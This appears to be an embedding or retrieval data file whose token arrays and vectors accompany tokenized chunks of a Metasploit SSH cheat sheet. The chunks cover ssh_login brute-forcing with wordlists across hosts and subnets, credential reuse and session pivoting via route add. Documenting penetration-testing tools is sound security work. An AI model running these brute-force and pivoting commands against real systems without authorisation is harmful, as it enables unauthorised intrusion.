1035, 9530, 8873, 2290, 2448, 5587, 17058, 1011, 1043, 6352, 3231, 1035, 5310, 1032, 1004, 1004, 5587, 20330, 1011, 1043, 3231, 1035, 5310, 1011, 1040, 1011, 1057, 6352, 1011, 1055, 1011, 1044, 1013, 2188, 1013, 3231, 1035, 5310, 1011, 1055, 1013, 8026, 1013, 14021, 3231, 1035, 5310, 2448, 9052, 1011, 1050, 1005, 3231, 1035, 5310, 1024, 20786, 12521, 2509, 1005, 1064, 10381, 15194, 21724, 14451, 2570, 4642, 2094, 1031, 1000, 1013, 2149, 2099, 1013, 24829, 2378, 1013, 7020, 14945, 1000, 1010, 1000, 1011, 1040, 1000, 1033, 3857, 1998, 2448, 1024, 8946, 2121, 3857, 1011, 1011, 6415, 7020, 2232, 1035, 6845, 1024, 6745, 1011, 1026, 8946, 2121, 8873, 2571, 8946, 2121, 2448, 1011, 1011, 28549, 1011, 2009, 1011, 1011, 10172, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 19015, 2475, 1024, 2570, 7020, 2232, 1035, 6845, 1024, 6745, 2009, 2323, 2085, 2022, 2825, 2000, 3231, 1996, 7020 ]
metasploit
12.txt
0
##h login from msfconsole : msf6 > use scanner / ssh / ssh _ login msf6 auxiliary ( scanner / ssh / ssh _ login ) > run ssh : / / test _ user : password123 @ 127. 0. 0. 1 : 2222 [ * ] 127. 0. 0. 1 : 2222 - starting bruteforce [ + ] 127. 0. 0. 1 : 2222 - success :'test _ user : password123'' uid = 700 ( test _ user ) gid = 700 ( test _ user ) groups = 700 ( test _ user ), 700 ( test _ user ) linux 5a26fe63abef 5. 10. 25 - linuxkit # 1 smp tue mar 23 09 : 27 : 39 utc 2021 x86 _ 64 linux'[ * ] ssh session 1 opened ( 127. 0. 0. 1 : 57318 - > 127. 0. 0. 1 : 2222 ) at 2022 - 04 - 23 01 : 25 : 01 + 0100 [ * ] scanned 1 of 1 hosts ( 100 % complete ) [ * ] auxiliary module execution completed note that tcp forwarding requires the allowtcpforwarding option to be enabled in the server ’ s configuration file, which is often the default. if the option is disabled or the more specific permitopen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. ssh enumerationenumerate ssh version : use auxiliary / scanner / ssh / ssh _ version run ssh : / / 127. 0. 0. 1 ssh bruteforcebrute - force host with known user and password list : use scanner / ssh / ssh _ login run ssh : / / known _ user @ 192. 168. 222. 1 threads = 50 pass _ file =. / wordlist. txt brute - force credentials : use scanner / ssh / ssh _ login run ssh : / / 192. 168. 222. 1 threads = 50 user _ file =. / users. txt pass _ file =. / wordlist. txt brute - force credentials in a subnet : use scanner / ssh / ssh _ login run cidr : / 24 : ssh : / / user : pass @ 192. 168. 222. 0 threads = 50 run cidr : / 24 : ss
[ 0.16425636410713196, -0.16655351221561432, 0.09149713814258575, 0.2185722440481186, -0.03225778788328171, 0.009598989970982075, -0.5070915222167969, 0.7085439562797546, 0.2702154815196991, 0.600188136100769, -0.08897148072719574, 0.6444622874259949, 0.20574229955673218, -0.3814224600791931, -0.5892619490623474, -0.10600883513689041, -0.37786391377449036, -0.47253674268722534, -0.7928711771965027, 0.3528670370578766, 0.06341381371021271, 0.27177679538726807, -1.2574139833450317, -0.877727746963501, -0.2353089600801468, 0.5166231989860535, 0.881754457950592, -0.2089834362268448, 0.5765289664268494, 0.6640682816505432, 0.3151482045650482, -0.355819970369339, 0.39638715982437134, -0.6331942081451416, 0.33900806307792664, 0.14172495901584625, 1.3084062337875366, -0.378991961479187, -0.04492075368762016, -0.5016644597053528, 0.35374194383621216, -0.2354571372270584, 0.04432021826505661, -0.6830018162727356, -0.3614611327648163, -0.5234507918357849, 0.3395289480686188, 0.35682371258735657, 0.8833705186843872, -0.2337813824415207, 0.5092651844024658, 0.026046520099043846, 0.08117283135652542, 0.15079593658447266, 0.30489659309387207, 0.3807472288608551, -0.5106375813484192, -0.028036484494805336, -0.3119581639766693, 0.7139999270439148, 0.40036848187446594, 0.5274893045425415, 0.5347177982330322, -0.8206803798675537, 0.4852922260761261, -0.42912235856056213, -0.07346675544977188, -0.4801638424396515, -0.6335693001747131, -0.30731654167175293, 0.038571953773498535, 0.7646245956420898, -0.6943615674972534, 0.003016205271705985, -0.8382050395011902, 0.27105656266212463, -0.07342246174812317, 0.02058061957359314, -0.45466724038124084, 0.7799590229988098, 0.01760648749768734, 0.5611653327941895, 0.8473519682884216, -0.2058529406785965, -0.17978087067604065, -0.5600283741950989, 0.7245780229568481, 0.1052224412560463, -0.28770825266838074, -0.2719477415084839, 1.1448134183883667, 0.26575329899787903, -0.64664626121521, -0.38340842723846436, 0.495447039604187, 0.5066913962364197, -0.8760024905204773, 0.02478243038058281, 0.5558554530143738, -0.3224414885044098, 0.39084553718566895, 0.707693874835968, 0.45433592796325684, 0.18034465610980988, -0.7455525994300842, 0.41281113028526306, 0.22180140018463135, 0.022111237049102783, 0.10840583592653275, -0.14056901633739471, 0.6866239309310913, -0.16434864699840546, 0.2452402263879776, -0.5939486622810364, -0.42809444665908813, 0.5185365080833435, 0.7398265600204468, 0.19609326124191284, -0.4809040129184723, 0.8297650218009949, 0.08565887808799744, -0.6374361515045166, 0.6748237013816833, -0.6523160338401794, -0.017503537237644196, -0.050776317715644836, -0.09319955855607986, 0.5707959532737732, -0.4646701216697693, -0.8915031552314758, 0.0037234320770949125, -0.607475757598877, -0.41490939259529114, 0.4954772889614105, -1.2237728834152222, 0.4214164912700653, 0.14538632333278656, 0.5616850256919861, 1.2527633905410767, -0.9968481063842773, 0.1719217747449875, 0.6310303807258606, 0.5872876644134521, 1.4100507497787476, 0.8792648911476135, -0.010858261957764626, -0.2673398554325104, 0.038660839200019836, -0.8605216145515442, 0.447829008102417, -0.6262645721435547, -0.056244585663080215, 0.056658387184143066, -0.20558354258537292, -0.31015005707740784, 0.23213055729866028, -0.7329793572425842, 0.624493420124054, -1.2578752040863037, 0.31662431359291077, -0.7002753615379333, 1.5632989406585693, 0.016473455354571342, 0.2888226807117462, 0.22925132513046265, 0.229807049036026, -0.1650102138519287, -0.31034040451049805, -0.47925782203674316, -0.6265475749969482, 0.4224792718887329, 0.1349993646144867, 0.8673121929168701, -0.21080482006072998, 1.2009319067001343, 0.8865659236907959, -0.21769879758358002, -0.02831409126520157, 0.5743228197097778, 0.6293467283248901, -0.7227757573127747, 0.47166526317596436, 0.8770080208778381, 1.1887149810791016, -0.006890979595482349, -0.13163527846336365, -0.13157115876674652, -0.4119340181350708, -0.8877367973327637, -0.4919501543045044, -0.4749355614185333, 0.6340342164039612, -0.6173781156539917, 0.3497733771800995, 0.9505878686904907, 0.20243480801582336, -1.1125930547714233, 0.14908626675605774, -0.03621364012360573, -1.274518370628357, -0.6870086193084717, 0.5373347401618958, -0.5576952695846558, 0.8827110528945923, -0.5822674036026001, -0.6324462890625, 1.4217790365219116, 1.025169849395752, -0.02187514677643776, 0.2182796746492386, 1.0048335790634155, 0.061378709971904755, -0.4580822288990021, -0.11093098670244217, 0.3234321177005768, -0.48164263367652893, -0.7137867212295532, 0.6397003531455994, 0.5709656476974487, -0.45522427558898926, -0.29134318232536316, 0.23658841848373413, 0.4109579920768738, 0.2793891429901123, -0.05511516332626343, -0.3638552725315094, -0.4115334749221802, 0.7056810855865479, -0.48507750034332275, -0.5554198622703552, -0.13551156222820282, 0.4887154996395111, -0.2061099112033844, 1.5036892890930176, 0.10440506041049957, -0.8880107402801514, 0.12838277220726013, 0.45886915922164917, 0.1751241534948349, 0.020002037286758423, -0.16346324980258942, 0.778661847114563, 0.6223114728927612, 0.6441774964332581, 0.25226205587387085, 0.24411705136299133, -0.024512996897101402, 0.05020465329289436, 0.5312501192092896, 0.4169880449771881, 0.326140820980072, 0.6874596476554871, 0.4621604382991791, -0.2991190254688263, -1.0105032920837402, 0.18707908689975739, 0.6608954071998596, 0.09359055012464523, -1.0560249090194702, -0.5772510170936584, -0.28472650051116943, -0.13891704380512238, -0.4014318287372589, -0.698776364326477, 0.11109887063503265, -0.15565527975559235, -0.2176266312599182, 0.5238479375839233, -0.10269883275032043, -0.6215393543243408, -0.7463054656982422, 0.15574169158935547, -1.3390097618103027, -0.6107136607170105, -0.8840452432632446, 0.1588713824748993, 0.407077819108963, -0.17162226140499115, 0.4609878659248352, -0.5383274555206299, -0.5014718770980835, 0.37082141637802124, 0.32105928659439087, 1.48407781124115, 0.11504504829645157, -0.004328008741140366, -0.9090889096260071, -0.319846510887146, -0.22855636477470398, 0.43115293979644775, -0.7064908742904663, -0.13841141760349274, 0.029314294457435608, -0.448302686214447, 0.011400312185287476, -0.8212561011314392, 0.7310845255851746, -0.79606032371521, -0.11025580763816833, -0.14609934389591217, -0.16991181671619415, -0.0497114472091198, 0.6682561039924622, 0.018528621643781662, -0.6494545340538025, 0.6044697761535645, 0.09312134236097336, 0.04695019870996475, 0.5370375514030457, 0.6536544561386108, -0.18284684419631958, 0.5525223612785339, 0.05482332035899162, 0.5293964743614197, -0.9269734025001526, 0.8934008479118347, 0.49485164880752563, 0.36643943190574646, 0.19216719269752502, -0.513002872467041, 0.12417007982730865, -0.8683679103851318, -0.19744649529457092, -0.2918871343135834, -0.4621744155883789, 0.6768697500228882, 0.3761581778526306, -1.0548326969146729, -0.15795743465423584, -0.48072054982185364, -0.2940704822540283, -0.13588713109493256, -0.6074055433273315, 0.5161508321762085, 0.33276715874671936, 0.28837355971336365, -0.29726511240005493, -0.6117329001426697, 0.5266762375831604, 0.6186434030532837, 0.2693672180175781, -0.2195855677127838, 0.3913038372993469, 0.6003408432006836, -0.7525814175605774, -0.06248877942562103, 0.11601810157299042, -0.32863035798072815, -0.3229481875896454, 0.06251081824302673, 0.3738757073879242, -0.13986288011074066, 0.8078811168670654, 0.7154768109321594, 0.047780465334653854, 0.2967381775379181, -0.9189883470535278, -0.06020408868789673, 0.22974403202533722, 0.2284751534461975, 0.9564816355705261, -0.650757372379303, 0.27139872312545776, 0.41420137882232666, -0.8057089447975159, -0.18712680041790009, -0.2279094159603119, -0.03329026699066162, 1.1424410343170166, -0.2362566888332367, 0.9686551094055176, -0.37135836482048035, 0.36656275391578674, 1.1067545413970947, -0.608440637588501, -0.3963559567928314, 0.7617642283439636, 0.0865975022315979, 0.34879952669143677, -0.008871465921401978, 0.22074860334396362, 0.05177254602313042, 0.2555706799030304, 0.711047887802124, -0.11506468802690506, -0.013789982534945011, -0.6389930844306946, -0.8942349553108215, -0.018281646072864532, -0.010468796826899052, -0.07103226333856583, -0.12188839167356491, -0.05179803445935249, -0.04792911186814308, -0.5163385272026062, -0.362719863653183, 0.7258635759353638, 1.0498863458633423, 0.7144923210144043, 0.482975572347641, 0.39574337005615234, -0.2473856508731842, 0.09831863641738892, 0.5923564434051514, -0.7401210069656372, 0.24369657039642334, -0.14868289232254028, 0.8942827582359314, -0.13354657590389252, 0.16210784018039703, -0.9287280440330505, 0.12548303604125977, -0.08317678421735764, -0.17843827605247498, 0.33460113406181335, -0.28835329413414, -0.32121187448501587, -0.17907193303108215, 0.39052054286003113, -0.21034158766269684, -0.8451080322265625, -0.23731139302253723, 0.27438363432884216, 1.0289547443389893, 0.8264744877815247, -0.679559051990509, -0.015907716006040573, -0.7789427042007446, -0.04443603381514549, 0.10319221764802933, -0.6445573568344116, -0.2485581636428833, -1.054931402206421, 0.027135921642184258, -0.8534389138221741, 0.12052939832210541, 0.27891993522644043, 0.10892590880393982, 0.6227610111236572, -0.9868622422218323, -0.43322381377220154, 0.028248729184269905, -0.2792496383190155, -1.1444244384765625, -0.040007445961236954, 0.22776277363300323, 0.4188860058784485, 0.38847091794013977, -0.09627694636583328, -0.4496808648109436, 0.3272098898887634, -0.24945126473903656, 0.2133866548538208, -0.7606990337371826, -0.32426875829696655, 0.14788326621055603, 0.011952193453907967, -0.18183214962482452, 0.6027682423591614, -0.31209415197372437, -0.17769354581832886, -0.26142969727516174, 0.21197471022605896, -0.26917222142219543, -0.13477718830108643, 0.9727334380149841, -0.04717288166284561, -0.32705920934677124, 0.19945202767848969, 0.271714985370636, -0.05043241009116173, 0.2525264322757721, 0.6699039340019226, -0.2541568875312805, 0.2611587643623352, -0.38593441247940063, 0.6202222108840942, 0.18824037909507751, 0.37804675102233887, 0.25515833497047424, -0.3289768695831299, 0.7633113265037537, 0.1105479970574379, 0.5631923675537109, -0.7924270629882812, -0.7847359776496887, 0.28928864002227783, 0.4252774715423584, 0.17226116359233856, 0.2565419673919678, 0.284396767616272, 0.548164427280426, 0.3970835506916046, -0.3039287030696869, -0.6336349248886108, -0.7685112953186035, -0.38673898577690125, 0.30418163537979126, 0.40277862548828125, -0.11831646412611008, 0.1553037315607071, -0.4921586215496063, -1.2696950435638428, 0.6870258450508118, -0.7685124278068542, -0.1151227205991745, -0.9448379278182983, 0.32945582270622253, -0.6262242197990417, -0.19194327294826508, -0.2885012626647949, 0.44393929839134216, -0.3315417468547821, 0.06825213879346848, -0.4814358651638031, 0.406842976808548, 0.4166010320186615, 0.08463215827941895, 0.26895827054977417, 0.27838629484176636, -0.11016811430454254, -0.5075053572654724, -0.22108536958694458, 0.7437446117401123, -0.5083151459693909, 0.6071295738220215, 0.14261512458324432, -0.15147171914577484, -0.7877862453460693, -0.9188594222068787, 0.06739586591720581, -0.2107759565114975, -0.2422056496143341, -0.676728367805481, -1.0979344844818115, -0.3668619692325592, -0.16074049472808838, 0.2084023505449295, -0.8454755544662476, 0.05267007276415825, -0.5607231855392456, -0.38197800517082214, 0.21959085762500763, 0.08828158676624298, -0.07317794859409332, -0.1437285840511322, -0.6824734807014465, 1.4130500555038452, -0.6539726257324219, 0.21246033906936646, 0.39972877502441406, 0.2731548249721527, 0.22225405275821686, 0.4181821346282959, -1.0228512287139893, -0.788217306137085, -0.06536629796028137, -0.467011958360672, 0.35683563351631165, 0.33500936627388, 0.04888481646776199, -0.31667694449424744, -0.03376343473792076, 0.044616539031267166, -0.1847912222146988, -0.5274701118469238, -0.2869594991207123, 0.3751310110092163, 1.4078248739242554, -0.770531952381134, 0.3057399094104767, 0.15873326361179352, 0.5191708207130432, 0.12500885128974915, -0.3486349284648895, -0.3474277853965759, -0.09991541504859924, -0.4161057472229004, -1.2298641204833984, 0.5214539766311646, 0.43956002593040466, -0.24077235162258148, 0.40177804231643677, 0.051113616675138474, 0.37438973784446716, -0.020927244797348976, 0.8562313914299011, 1.2271374464035034, 0.2047484964132309, 0.18702509999275208, -1.0806803703308105, 0.453165203332901, 0.2877851128578186, 0.2001737356185913, -0.547062873840332, -0.08122019469738007, -0.35796886682510376, 0.8007089495658875, -0.6008320450782776, -0.13328061997890472, -0.8405929803848267, -0.8529696464538574, 0.34444764256477356, -0.17664144933223724, 0.45847025513648987, -0.6501837968826294, -0.8529419302940369, -0.36311572790145874, 0.9204033017158508, 0.03993101418018341, 0.023501848801970482, 0.24599197506904602, 0.192689448595047, 0.27618980407714844, -0.7437764406204224, 0.577023446559906, -0.32043740153312683, -0.531644344329834, 0.8145051002502441, 0.2505352795124054, -0.1743880659341812, 1.062296986579895, 0.5782172679901123, -1.5051242113113403, -0.7269832491874695, -0.47227463126182556, -0.3918733298778534, -0.09299572557210922, -0.4932781159877777, -0.7302658557891846, -0.15566693246364594, -0.44358018040657043, 0.30633726716041565, 0.5494974851608276, 0.4758891761302948, 0.4318724572658539, -0.5328542590141296, -0.15729428827762604, -0.2625395953655243, 0.3890889585018158, 0.6382919549942017, -1.137929916381836, -0.5737102031707764, -0.9462834000587463, -0.3036208152770996, 0.33631667494773865, 0.49254873394966125, 0.5878475904464722, -0.19756832718849182, 0.2390667051076889, 0.7238828539848328, -0.12735816836357117, 0.5813803672790527, 0.2272193282842636, 1.007335901260376, 0.6876981854438782, 0.4779100716114044, -0.633209228515625, -0.7267066836357117, 0.03336187079548836, -0.36534300446510315, 1.273594856262207, -0.32488593459129333, -0.08606915920972824, 0.5767756700515747, 0.2614324390888214, -0.3369376063346863, -1.2058608531951904, -1.1984676122665405, -0.5762956142425537, -0.28951653838157654, 0.01765781082212925, -0.35153597593307495, -0.024721216410398483, 0.6801111102104187, -0.42526140809059143, 0.0299447663128376, -0.7472978830337524, -0.08249464631080627, -0.8991394639015198, 0.10434677451848984, -0.43622592091560364, 0.10940415412187576, -0.8442992568016052, -0.5341489911079407, -0.5615804195404053, -0.443995863199234, -0.5055533647537231, -0.5051159262657166, -0.12298784404993057, 0.1495814174413681, 0.0072983005084097385, 0.3258625566959381, -0.6193593144416809, 0.15700605511665344, -0.08212175965309143, -0.9402492046356201, 0.2429969608783722, 0.29669931530952454, -0.4946701228618622, 0.21996121108531952, 0.33651602268218994, 0.1603139489889145, 0.4406560957431793, -0.7454836964607239, -0.029507869854569435, -0.2328166514635086, -0.11803793162107468, 0.3078394830226898, 0.028405535966157913, -0.610657811164856, 0.14771266281604767, -0.1955338418483734, -0.35001423954963684, -0.04395869001746178, -0.2326435148715973, -0.5491854548454285, 0.4776972830295563, -0.11010528355836868, 0.20464569330215454, 0.9901212453842163, -0.14788469672203064, 0.03434096276760101, -0.48909589648246765, 0.3453020453453064, -0.08657528460025787, -0.3002873361110687, 0.04554147645831108, 0.1884760856628418, 0.5321164727210999, -0.6861637234687805, 0.03424900025129318, -0.1321767121553421, -0.5241191983222961, 0.7531372904777527, 0.3127725124359131, -0.0816088616847992, -0.31630006432533264, -0.28492453694343567, 0.4335322976112366, 0.53501957654953, 0.24170003831386566, -0.22673645615577698, 0.24820806086063385, -0.6161249279975891, -1.4694241285324097, 0.07890312373638153, -1.197283148765564, 0.21586774289608002, 0.11699487268924713, -0.6464192867279053, -0.5490297079086304, -0.5688570737838745, -0.3336944282054901, 1.0986040830612183, 0.05067187547683716, -0.6789216995239258, -0.07322638481855392, -0.6042616963386536, 0.1365492343902588, 0.8897098302841187, -1.065482497215271, -0.9018054604530334, -0.58784019947052, 0.39412152767181396, -0.8119605779647827, -1.2127015590667725, 0.04348568990826607, 0.4429277777671814, 0.6842056512832642, 0.11550813913345337, -0.5223159790039062, 0.07800888270139694, 0.6837080121040344, -0.7802698612213135, 0.029369376599788666, 0.21544380486011505, -0.8544479012489319, 0.4285421073436737, -0.13748988509178162, 0.15434032678604126, -0.09400514513254166, 0.3729991614818573, -0.03538484871387482, -0.2567473351955414, -0.5199498534202576, 0.4336591362953186, -0.24187971651554108, -0.16707800328731537, 0.52316814661026, 0.7254306674003601, 0.8929625153541565, -0.6396774053573608, 0.24570858478546143, -0.39527401328086853, 0.29403939843177795, 1.1306114196777344, 0.09176193177700043, 0.7026086449623108, 1.074868083000183, 0.43185311555862427, -0.6238405108451843, -0.08543068915605545, 0.6419427394866943, -0.2187996804714203, -0.5152994394302368, 0.8982439637184143, -0.6559333801269531, 0.20217400789260864, 0.2611387372016907, -0.07481592893600464, -0.198513001203537, 0.4680308401584625, 0.7671046257019043, 0.2934187352657318, 0.3831561207771301, 1.3886774778366089, -0.5072782635688782, 0.861026406288147, 0.2778914272785187, -0.122370146214962, 0.38632121682167053, 0.013436667621135712, -1.0558208227157593, 0.7030086517333984, 1.2074216604232788, 0.5741371512413025, -0.2236408293247223, 0.8082029223442078, -0.39490047097206116, 0.10163982957601547, 0.5801239013671875, 0.2450254112482071, -0.4822874963283539, -0.027241338044404984, -0.28394779562950134, -0.6699641346931458, -0.09889699518680573, -0.4043060541152954, 0.3829726576805115, -0.05647972598671913, 0.6902907490730286, 0.05432281270623207, 0.3083171248435974, -0.477087140083313, 0.9480398893356323, -0.09220198541879654, 0.23483717441558838, 0.24089345335960388, -0.5170267820358276, -0.4160268306732178, 1.3108822107315063, 0.3355036675930023, 0.6044970154762268, 0.22899578511714935, 1.281257152557373, 0.20894087851047516, 0.2811526358127594, 0.2218904048204422, -0.011771203950047493, -0.6866546869277954, 0.40948402881622314, -0.3489709496498108, -0.46192359924316406, 0.17494216561317444, -0.016603846102952957, 1.0189145803451538, -0.2691648304462433, -0.29612910747528076, -0.3108196258544922, 0.4872646927833557, -0.34002795815467834, -0.6162363886833191, 0.9964777827262878, -0.0023145561572164297, -0.5184752941131592, 0.353602796792984, 0.3358985483646393, 0.6921374201774597, 0.28062760829925537, -0.20079080760478973, -1.2407604455947876, -1.208174228668213, -0.6444719433784485, -0.0792018324136734, 0.7936949729919434, -0.0484488271176815, 0.1185847669839859, -0.19250498712062836, -1.094009518623352, -0.5361061692237854, 0.2747667133808136, -0.4174864888191223, -1.0792895555496216, 0.32386940717697144, 0.3970206379890442, 0.458712100982666, 0.5809767842292786, -0.20565642416477203, -0.5304827094078064, -0.2548600137233734, 1.0273537635803223, -0.34812456369400024, 0.6065388321876526, 0.3105265498161316, -0.14016510546207428, 0.04411382973194122, -0.4697250425815582, 0.6128513813018799, -0.36238911747932434, 0.3169654309749603, -0.22826330363750458, -0.4319934546947479, -0.5817574262619019, -0.11131586134433746, -0.09012371301651001, -0.7031828761100769, 0.1175888329744339, -0.0191803015768528, -0.9870851039886475, -0.5851791501045227, 0.2478414922952652, -0.4408513605594635, -0.8021885752677917, 0.1005224734544754, 0.9913438558578491, -0.042554497718811035, -0.6588417887687683, -1.2167288064956665, 3.9065325260162354, 0.17240729928016663, -0.05231940746307373, -0.20954249799251556, 0.20314694941043854, 0.07875849306583405, 1.011431097984314, 0.017310798168182373, 0.11570551246404648, -0.3336464762687683, 0.4390562176704407, 0.6235020756721497, 0.6261783838272095, 0.49641719460487366, 0.5750885605812073, 0.5836484432220459, -0.5218908190727234, -0.35179635882377625, 0.4497167468070984, -1.3022888898849487, -0.5568867921829224, 0.12340691685676575, -0.3985169529914856, 0.8980592489242554, 0.3984625041484833, 0.489207923412323, 0.5525766611099243, -0.9475904703140259, -0.6328376531600952, -0.3200926184654236, 0.10584121942520142, -0.6213370561599731, -0.3704243004322052, 0.03948082774877548, -0.5790128707885742, 0.20475441217422485, -0.22278106212615967, -0.4898536503314972, -0.8064397573471069, -0.18791256844997406, 0.7876788377761841, 0.23908859491348267, 0.046148091554641724, -0.6200741529464722, -0.37923091650009155, 0.42091748118400574, -0.6064237952232361, -0.33150923252105713, 0.6107654571533203, -1.0563791990280151, 0.5527793765068054, 0.325217068195343, 1.1011615991592407, 0.43054619431495667, -0.562821090221405, -0.23118160665035248, 0.12123490124940872, -0.6927258968353271, 0.5352708697319031, 0.2565595209598541, 0.6546623706817627, -0.24351564049720764, -0.04568586125969887, -0.4033878743648529, -0.6503868699073792, 0.7646867632865906, 0.12629839777946472, -0.44593846797943115, -0.42760246992111206, -0.35725775361061096, 0.03325068950653076, -0.3155767023563385, -1.0783276557922363, 0.12031624466180801, 0.9404708743095398, 0.1570049524307251, 0.0020619621500372887, 0.762119472026825, 0.8952828049659729, -0.270240843296051, -0.2291225790977478, -0.5749976634979248, -1.133377194404602, -0.125170037150383, 0.33447545766830444, 0.4258072078227997, 0.09618217498064041, -0.7166202664375305, -0.10463928431272507, -0.021244371309876442, 0.4456147253513336, 0.8173620104789734, -0.8031386733055115, 0.5493869185447693, 0.18892976641654968 ]
[ 2232, 8833, 2378, 2013, 5796, 11329, 5644, 9890, 1024, 5796, 2546, 2575, 1028, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 1007, 1028, 2448, 7020, 2232, 1024, 1013, 1013, 3231, 1035, 5310, 1024, 20786, 12521, 2509, 1030, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 19015, 2475, 1031, 1008, 1033, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 19015, 2475, 1011, 3225, 26128, 14821, 1031, 1009, 1033, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 19015, 2475, 1011, 3112, 1024, 1005, 3231, 1035, 5310, 1024, 20786, 12521, 2509, 1005, 1005, 21318, 2094, 1027, 6352, 1006, 3231, 1035, 5310, 1007, 21025, 2094, 1027, 6352, 1006, 3231, 1035, 5310, 1007, 2967, 1027, 6352, 1006, 3231, 1035, 5310, 1007, 1010, 6352, 1006, 3231, 1035, 5310, 1007, 11603, 1019, 2050, 23833, 7959, 2575, 2509, 16336, 2546, 1019, 1012, 2184, 1012, 2423, 1011, 11603, 23615, 1001, 1015, 15488, 2361, 10722, 2063, 9388, 2603, 5641, 1024, 2676, 1024, 4464, 11396, 25682, 1060, 20842, 1035, 4185, 11603, 1005, 1031, 1008, 1033, 7020, 2232, 5219, 1015, 2441, 1006, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 5401, 21486, 2620, 1011, 1028, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 19015, 2475, 1007, 2012, 16798, 2475, 1011, 5840, 1011, 2603, 5890, 1024, 2423, 1024, 5890, 1009, 5890, 8889, 1031, 1008, 1033, 11728, 1015, 1997, 1015, 6184, 1006, 2531, 1003, 3143, 1007, 1031, 1008, 1033, 9830, 11336, 7781, 2949, 3602, 2008, 22975, 2361, 2830, 2075, 5942, 1996, 3499, 13535, 14376, 2953, 7652, 2075, 5724, 2000, 2022, 9124, 1999, 1996, 8241, 1521, 1055, 9563, 5371, 1010, 2029, 2003, 2411, 1996, 12398, 1012, 2065, 1996, 5724, 2003, 9776, 2030, 1996, 2062, 3563, 9146, 26915, 5724, 2515, 2025, 3499, 1996, 4434, 2000, 2022, 2081, 1010, 1996, 4434, 2097, 8246, 2007, 1996, 23710, 10890, 7561, 1012, 7020, 2232, 4372, 17897, 8156, 2368, 17897, 11657, 7020, 2232, 2544, 1024, 2224, 9830, 1013, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 2544, 2448, 7020, 2232, 1024, 1013, 1013, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 7020, 2232, 26128, 14821, 19892, 10421, 1011, 2486, 3677, 2007, 2124, 5310, 1998, 20786, 2862, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 7020, 2232, 1024, 1013, 1013, 2124, 1035, 5310, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1015, 16457, 1027, 2753, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 26128, 1011, 2486, 22496, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 7020, 2232, 1024, 1013, 1013, 17613, 1012, 16923, 1012, 19015, 1012, 1015, 16457, 1027, 2753, 5310, 1035, 5371, 1027, 1012, 1013, 5198, 1012, 19067, 2102, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 26128, 1011, 2486, 22496, 1999, 1037, 4942, 7159, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 28744, 2099, 1024, 1013, 2484, 1024, 7020, 2232, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1014, 16457, 1027, 2753, 2448, 28744, 2099, 1024, 1013, 2484, 1024, 7020 ]
metasploit
12.txt
1
##h : / / user @ 192. 168. 222. 0 threads = 50 pass _ file =. / wordlist. txt ssh login sessionif you have valid ssh credentials the ssh _ login module will open a metasploit session for you : use scanner / ssh / ssh _ login run ssh : / / user : pass @ 172. 18. 102. 20 re - using ssh credentials in a subnet : use scanner / ssh / ssh _ login run cidr : / 24 : ssh : / / user : pass @ 192. 168. 222. 0 threads = 50 using an alternative port : use scanner / ssh / ssh _ login run ssh : / / user : pass @ 192. 168. 123. 6 : 2222 ssh pivotingit is only possible to perform ssh pivoting if the remote target has the allowtcpforwarding option be enabled in the server ’ s configuration file, which is often the default. if the option is disabled or the more specific permitopen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. like meterpreter, it is possible to port forward through a metasploit ssh session : route add 172. 18. 103. 0 / 24 ssh _ session _ id to a route for the most recently opened meterpreter session : route add 172. 18. 103. 0 / 24 - 1 [SEP]
[ 0.678810179233551, -0.400953471660614, -0.7822667360305786, -0.0748748779296875, -0.20428712666034698, -0.08831176906824112, -0.3961855471134186, 0.30271950364112854, 0.0494832880795002, 0.7480500936508179, 0.22633346915245056, 0.13569276034832, 0.45535293221473694, -0.3371736407279968, -0.49954861402511597, 0.21245123445987701, 0.023907234892249107, -0.05785829946398735, -0.06763088703155518, -0.04607190936803818, 0.28338247537612915, 0.2914978563785553, -0.9677844047546387, -0.5467025637626648, -0.49594196677207947, -0.0071952203288674355, -0.13415664434432983, 0.013778435066342354, 0.8039619326591492, 0.44429343938827515, -0.14829190075397491, 0.5431049466133118, 0.6880927085876465, -0.4445895552635193, 0.20404212176799774, -0.7626175880432129, 0.5582954287528992, -0.2053564488887787, -0.19339118897914886, -0.4208582639694214, -0.11687412858009338, 0.5263621211051941, 0.004067851230502129, -0.8850997686386108, -0.2815444767475128, 0.1244485005736351, -0.535325288772583, -0.0876457691192627, -0.23704317212104797, -0.37680408358573914, -0.70229172706604, 0.471445232629776, 0.18622232973575592, -0.4030219614505768, 0.12399891018867493, -0.13461850583553314, -0.22705233097076416, -0.6226469278335571, -0.5149818658828735, 0.9947461485862732, 0.028507770970463753, 0.8491043448448181, 0.16633881628513336, -0.4148120582103729, 0.23677930235862732, 0.3004975914955139, -0.5063703656196594, -0.354142427444458, -0.08794013410806656, -0.610975980758667, -0.3163955807685852, 0.13244837522506714, -0.1466602236032486, -0.30219754576683044, -0.19098781049251556, 0.7881192564964294, 0.530543327331543, 0.06118825823068619, 0.13621774315834045, 1.6340556144714355, 0.3163754642009735, 0.4206854999065399, 0.2247377187013626, -0.4331885278224945, -0.3820746839046478, 0.046714384108781815, 0.5554184317588806, -0.1452321708202362, -0.11546677350997925, -0.4493089020252228, 0.12908129394054413, 0.6783310174942017, -0.7712093591690063, -0.18652978539466858, 